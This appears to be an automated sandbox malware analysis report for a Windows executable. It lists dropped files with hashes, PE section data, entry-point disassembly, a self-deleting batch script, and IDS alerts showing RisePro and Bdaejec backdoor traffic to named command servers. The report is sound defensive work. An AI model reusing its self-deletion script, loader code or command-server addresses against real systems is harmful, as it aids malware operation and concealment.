                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\Desktop\hunta[1].exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):2383872
                                  Entropy (8bit):7.92928937448595
                                  Encrypted:false
                                  SSDEEP:49152:QSPmGpG0CTiBOGt/tP0HtQ0dcMjXyMxB/x5UGn77l7G4bo8jqOs8DoV:bPmG8HTiVtWQXqiMxVQaRGy3qOs8U
                                  MD5:651DE10CFAAA78BE50EDA9F3F0CE9EA7
                                  SHA1:6B922567FC5880E38FC9A3EACC24F6BAB3785731
                                  SHA-256:E5CB4F3F8D41C28116B9FF3253AB5F6D6736E18DA2D225CF15379954B2751643
                                  SHA-512:B3D038963134F43113831D929787AAC25E597E17E763C3955660E7D1ED63539C7A929A19A95AE306B390955FFCBAD89EB3857402BDE3159093AC43DFE9244446
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 95%
                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..................PE..L......e...............".....,........[...........@..........................`[...........@.................................T...h....p.............................................................................................................. . .`..........................@....rsrc........p... ..................@....idata ............................@... .P+.......... ..............@...gpsaqaiu......?......"..............@...zlufpcnd......Z.......#.............@....taggant.0....Z.."....#.............@......u...P....[..B....$............. ...................................................................................................................................................
                                  Process:C:\Users\user\Desktop\hunta[1].exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):26
                                  Entropy (8bit):3.95006375643621
                                  Encrypted:false
                                  SSDEEP:3:ggPYV:rPYV
                                  MD5:187F488E27DB4AF347237FE461A079AD
                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                  Malicious:true
                                  Preview:[ZoneTransfer]....ZoneId=0
                                  Process:C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):186
                                  Entropy (8bit):5.037975025098174
                                  Encrypted:false
                                  SSDEEP:3:jdKZOMERE2J5xAIfyYMD2UMERE2J5xAIfy2KReJsjIdKZOMERE2J5xAI8zSSIvn:jdKoFi23fbMD2UFi23f1/dKoFi23fm7S
                                  MD5:A36A25EA46FD51980F8AA5BAC2926029
                                  SHA1:B433B68DDD9D510829FE4B55EFA1D7A68125AFA4
                                  SHA-256:622456EADAFBE5092A5DA5C0D45E8CFA46640A5558EEB4977E559ACBC71FE529
                                  SHA-512:A00D1582041D84DAC3C2D18D23DE84ED5A11B3F6103533D461DF933DDC61B237CBAB13C794B59FC41C6606660B154E255445067434C90D3B681469D94014B735
                                  Malicious:false
                                  Preview::DELFILE..del "C:\Users\user\AppData\Local\Temp\WwKLWFk.exe"..if exist "C:\Users\user\AppData\Local\Temp\WwKLWFk.exe" goto :DELFILE..del "C:\Users\user\AppData\Local\Temp\149657b0.bat"..
                                  Process:C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  File Type:ASCII text
                                  Category:modified
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\Desktop\hunta[1].exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):15872
                                  Entropy (8bit):7.031075575407894
                                  Encrypted:false
                                  SSDEEP:384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
                                  MD5:F7D21DE5C4E81341ECCD280C11DDCC9A
                                  SHA1:D4E9EF10D7685D491583C6FA93AE5D9105D815BD
                                  SHA-256:4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
                                  SHA-512:E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 92%
                                  Joe Sandbox View:
                                  • Filename: FC0D639C0918938BDF00FA6F1DC4BC03002C328428FC34A34B050AEE8E3BEB8C.exe, Detection: malicious, Browse
                                  • Filename: FBD0DD6CFA4C80E07EDB97767D169EC45066A58B9D2FD475BE13BC4A7CC4DFA2.exe, Detection: malicious, Browse
                                  • Filename: Fantom.exe, Detection: malicious, Browse
                                  • Filename: FC8BD535BF98089640F0589D3FE30FB55B1287278F9B42D66C91D397E00BA23A.exe, Detection: malicious, Browse
                                  • Filename: fax_390392029_072514.exe, Detection: malicious, Browse
                                  • Filename: F5D89DECEF6271D813BE49A3CB4C630364CBA87FDE4FD9BCE81821479D1E771E.exe, Detection: malicious, Browse
                                  • Filename: F8DB10513DB12A4BB861D7B1F52E56F5DE5F5DBA7614FDEE3DB67B191FEE85C6.exe, Detection: malicious, Browse
                                  • Filename: F891E10C9A7B6D0CBBBB6B3D103CF3DC935541430C5363648E6E1A3203BDD76D.exe, Detection: malicious, Browse
                                  • Filename: F898E35329AE242F1F8C0E64EFDE783E9742671336598AD9824073DECAE40F4A.exe, Detection: malicious, Browse
                                  • Filename: Endermanch@SecurityDefener2015.exe, Detection: malicious, Browse
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\hunta[1].exe
                                  File Type:ASCII text, with no line terminators
                                  Category:modified
                                  Size (bytes):13
                                  Entropy (8bit):2.8731406795131336
                                  Encrypted:false
                                  SSDEEP:3:LEQFgn:6n
                                  MD5:F23A032E765F1A346A05F8C739508BAE
                                  SHA1:BB87AC0EC1E76E65A6217216AB17D49EC440F223
                                  SHA-256:A08B215A7DA674F033A10189A1579E758D854723A076B89651C9D527245A0D7A
                                  SHA-512:E68073B7AD60591266AFA80ADB05C1D16B6BE980F8E942FEB05265753B3B2E5A41C2277424CB2CD27ABFD4B78AAB0439304433B932F31C209C129D5DADCA6890
                                  Malicious:false
                                  Preview:1721871434085
                                  Process:C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  File Type:MS Windows registry file, NT/2000 or above
                                  Category:dropped
                                  Size (bytes):1835008
                                  Entropy (8bit):4.296108056230021
                                  Encrypted:false
                                  SSDEEP:6144:641fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+Q4mBMZJh1Vjq:j1/YCW2AoQ0Ni64wMHrV2
                                  MD5:F3B3450CB71F2E7F3309FA2B02FA6D35
                                  SHA1:FD80BF3B5DF694D7FD6162FC065645DEA1B834F2
                                  SHA-256:4DA3591582617C629138DE6339E91CF2D57ED1FA93B42C98B23FF09B2E5A2542
                                  SHA-512:5695FE1C70C376AD84EF72C40B8D16F6FACEC0E2B8CCAC65ED90264FD9AC5FE0A6570A966A92514BDF85C62B484E5ACE7833BDB9D2CBEEBD1692576D37A3AB70
                                  Malicious:false
                                  Preview:regfH...H....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....'...............................................................................................................................................................................................................................................................................................................................................+)..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.92928937448595
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:hunta[1].exe
                                  File size:2'383'872 bytes
                                  MD5:651de10cfaaa78be50eda9f3f0ce9ea7
                                  SHA1:6b922567fc5880e38fc9a3eacc24f6bab3785731
                                  SHA256:e5cb4f3f8d41c28116b9ff3253ab5f6d6736e18da2d225cf15379954b2751643
                                  SHA512:b3d038963134f43113831d929787aac25e597e17e763c3955660e7d1ed63539c7a929a19a95ae306b390955ffcbad89eb3857402bde3159093ac43dfe9244446
                                  SSDEEP:49152:QSPmGpG0CTiBOGt/tP0HtQ0dcMjXyMxB/x5UGn77l7G4bo8jqOs8DoV:bPmG8HTiVtWQXqiMxVQaRGy3qOs8U
                                  TLSH:A1B523C87C455053C6803B7808E2FBB8135EFD666811A4DD1DDDBFABB5B3A1E2A1281D
                                  File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C...............L.......L.......L.......H.G.....H.......H.......H...R...L.......L.......L.........................E.......-....
                                  Icon Hash:7192ecece8b2924d
                                  Entrypoint:0x9b1000
                                  Entrypoint Section:u
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x65C5D990 [Fri Feb 9 07:51:44 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:6
                                  OS Version Minor:0
                                  File Version Major:6
                                  File Version Minor:0
                                  Subsystem Version Major:6
                                  Subsystem Version Minor:0
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                                  Instruction
                                  push ebp
                                  mov ebp, esp
                                  sub esp, 0000016Ch
                                  xor eax, eax
                                  push ebx
                                  push esi
                                  push edi
                                  mov dword ptr [ebp-24h], eax
                                  mov dword ptr [ebp-10h], eax
                                  mov dword ptr [ebp-14h], eax
                                  mov dword ptr [ebp-08h], eax
                                  mov dword ptr [ebp-0Ch], eax
                                  mov dword ptr [ebp-20h], eax
                                  mov dword ptr [ebp-18h], eax
                                  mov dword ptr [ebp-48h], 4C4B7757h
                                  mov dword ptr [ebp-44h], 2E6B4657h
                                  mov dword ptr [ebp-40h], 00657865h
                                  mov dword ptr [ebp-3Ch], 00000000h
                                  call 00007FF2E4DBEBB5h
                                  pop eax
                                  add eax, 00000225h
                                  mov dword ptr [ebp-04h], eax
                                  mov eax, dword ptr fs:[00000030h]
                                  mov dword ptr [ebp-28h], eax
                                  mov eax, dword ptr [ebp-04h]
                                  mov dword ptr [eax], E904C483h
                                  mov eax, dword ptr [ebp-04h]
                                  mov dword ptr [eax+04h], FFFFCD8Fh
                                  mov eax, dword ptr [ebp-28h]
                                  mov eax, dword ptr [eax+0Ch]
                                  mov eax, dword ptr [eax+1Ch]
                                  mov eax, dword ptr [eax]
                                  mov eax, dword ptr [eax+08h]
                                  mov ecx, dword ptr [eax+3Ch]
                                  mov ecx, dword ptr [ecx+eax+78h]
                                  add ecx, eax
                                  mov edi, dword ptr [ecx+1Ch]
                                  mov ebx, dword ptr [ecx+20h]
                                  mov esi, dword ptr [ecx+24h]
                                  mov ecx, dword ptr [ecx+18h]
                                  add esi, eax
                                  add edi, eax
                                  add ebx, eax
                                  xor edx, edx
                                  mov dword ptr [ebp-30h], esi
                                  mov dword ptr [ebp-1Ch], edx
                                  mov dword ptr [ebp-34h], ecx
                                  cmp edx, dword ptr [ebp-34h]
                                  jnc 00007FF2E4DBECFEh
                                  movzx ecx, word ptr [esi+edx*2]
                                  mov edx, dword ptr [ebx+edx*4]
                                  mov esi, dword ptr [edi+ecx*4]
                                  add edx, eax
                                  mov ecx, dword ptr [edx]
                                  add esi, eax
                                  cmp ecx, 4D746547h
                                  jne 00007FF2E4DBEC04h
                                  cmp dword ptr [edx+04h], 6C75646Fh
                                  jne 00007FF2E4DBEBFBh
                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1490540x68.idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1370000x110a0.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1491f80x8.idata
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  0x10000x1360000x8ee00cd6442fec8f341707696f984faa4d78bFalse0.9998547544838146data7.9863529700778955IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc0x1370000x110a00x2000727385ea023e9253dbdf69e389aa8ff1False0.9827880859375data7.902116199037549IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .idata 0x1490000x10000x200588e00183b8b4dbb8c7106492f04143dFalse0.14453125data0.9824704719748909IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  0x14a0000x2b50000x2007a50857f6d34b47210dbbad5003b056cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  gpsaqaiu0x3ff0000x1ae0000x1ad600ad542a4e9f81fcf7589b29333531520dFalse0.9599566730349345data7.9114235300996505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  zlufpcnd0x5ad0000x10000x400b1ea94bf854d31daec7fad7084ce733fFalse0.7734375data6.143680843141886IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .taggant0x5ae0000x30000x220068cde77e3c15a44cac965f245c5cd08fFalse0.06261488970588236DOS executable (COM)0.793567734391058IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  u0x5b10000x50000x420059b6515994875e6b630ac9b497033341False0.7775804924242424data6.9350665765420185IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_ICON0x59b58c0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/mRussianRussia0.10367620962971726
                                  RT_GROUP_ICON0x5abdb40x14dataRussianRussia1.15
                                  RT_VERSION0x5abdc80x2b4dataRussianRussia0.48121387283236994
                                  RT_MANIFEST0x5ac07c0x2e6XML 1.0 document, ASCII text, with CRLF line terminators0.45417789757412397
                                  RT_MANIFEST0x5ac3620x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                  DLLImport
                                  kernel32.dlllstrcpy
                                  Language of compilation systemCountry where language is spokenMap
                                  RussianRussia
                                  EnglishUnited States
                                  TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                  2024-07-25T02:17:03.940751+0200TCP2046269ET MALWARE [ANY.RUN] RisePro TCP (Activity)4972550500192.168.2.10193.233.132.62
                                  2024-07-25T02:16:43.753403+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update49718443192.168.2.1020.189.173.21
                                  2024-07-25T02:16:37.270173+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49710799192.168.2.1044.221.84.105
                                  2024-07-25T02:16:43.236158+0200TCP2046269ET MALWARE [ANY.RUN] RisePro TCP (Activity)4971350500192.168.2.10193.233.132.62
                                  2024-07-25T02:16:30.189325+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup5968453192.168.2.101.1.1.1
                                  2024-07-25T02:16:56.571937+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49723799192.168.2.1044.221.84.105
                                  2024-07-25T02:16:53.692444+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49721799192.168.2.1044.221.84.105
                                  2024-07-25T02:16:34.626885+0200TCP2049060ET MALWARE RisePro TCP Heartbeat Packet4970950500192.168.2.10193.233.132.62
                                  2024-07-25T02:16:57.861221+0200TCP2046269ET MALWARE [ANY.RUN] RisePro TCP (Activity)4972250500192.168.2.10193.233.132.62
                                  2024-07-25T02:16:43.267413+0200TCP2046269ET MALWARE [ANY.RUN] RisePro TCP (Activity)4971450500192.168.2.10193.233.132.62
                                  2024-07-25T02:16:34.027382+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49708799192.168.2.1044.221.84.105
                                  2024-07-25T02:16:40.273973+0200TCP2049060ET MALWARE RisePro TCP Heartbeat Packet4971350500192.168.2.10193.233.132.62
                                  2024-07-25T02:17:00.839786+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49724799192.168.2.1044.221.84.105
                                  2024-07-25T02:17:03.563869+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49726799192.168.2.1044.221.84.105
                                  2024-07-25T02:16:50.770303+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49720799192.168.2.1044.221.84.105
                                  2024-07-25T02:16:37.631540+0200TCP2046269ET MALWARE [ANY.RUN] RisePro TCP (Activity)4970950500192.168.2.10193.233.132.62
                                  2024-07-25T02:17:24.819852+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434972752.165.165.26192.168.2.10
                                  2024-07-25T02:16:30.743771+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49707799192.168.2.1044.221.84.105
                                  2024-07-25T02:16:47.540655+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971952.165.165.26192.168.2.10
                                  TimestampSource PortDest PortSource IPDest IP
                                  Jul 25, 2024 02:16:30.323812962 CEST49707799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:30.328953981 CEST7994970744.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:30.329042912 CEST49707799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:30.329478979 CEST49707799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:30.336174011 CEST7994970744.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:30.743611097 CEST7994970744.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:30.743724108 CEST7994970744.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:30.743771076 CEST49707799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:30.743829966 CEST49707799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:30.749145031 CEST49707799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:30.754101038 CEST7994970744.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:33.600622892 CEST49708799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:33.605627060 CEST7994970844.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:33.605736971 CEST49708799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:33.606467962 CEST49708799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:33.611356974 CEST7994970844.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:34.027318954 CEST7994970844.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:34.027338982 CEST7994970844.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:34.027381897 CEST49708799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:34.027422905 CEST49708799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:34.040843010 CEST49708799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:34.045862913 CEST7994970844.221.84.105192.168.2.10
                                  Jul 25, 2024 02:16:34.599961042 CEST4970950500192.168.2.10193.233.132.62
                                  Jul 25, 2024 02:16:34.604837894 CEST5050049709193.233.132.62192.168.2.10
                                  Jul 25, 2024 02:16:34.604916096 CEST4970950500192.168.2.10193.233.132.62
                                  Jul 25, 2024 02:16:34.626884937 CEST4970950500192.168.2.10193.233.132.62
                                  Jul 25, 2024 02:16:34.631818056 CEST5050049709193.233.132.62192.168.2.10
                                  Jul 25, 2024 02:16:36.862087011 CEST49710799192.168.2.1044.221.84.105
                                  Jul 25, 2024 02:16:36.867377043 CEST7994971044.221.84.105192.168.2.10
